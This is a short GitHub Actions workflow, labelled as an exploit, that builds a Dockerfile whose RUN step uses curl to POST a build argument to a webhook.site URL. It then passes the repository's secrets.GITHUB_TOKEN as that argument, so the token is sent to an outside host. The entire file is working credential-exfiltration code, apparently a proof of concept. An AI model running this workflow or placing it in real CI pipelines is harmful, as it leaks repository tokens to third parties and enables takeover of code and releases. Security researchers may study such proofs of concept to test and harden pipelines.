name: Leak GITHUB_TOKEN via Docker ARG Injection

on:
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Create base Dockerfile
        run: echo "FROM alpine" > Dockerfile

      - name: Append malicious curl command
        run: |
          echo 'ARG LEAK_TOKEN' >> Dockerfile
          echo 'RUN apk add curl && curl -X POST -d "token=$LEAK_TOKEN" https://webhook.site/529200f3-872d-4083-bf2d-b5c014761b69' >> Dockerfile

      - name: Trigger token leak via build-arg
        run: |
          docker build \
            --build-arg LEAK_TOKEN="${{ secrets.GITHUB_TOKEN }}" \
            -t leak-image .
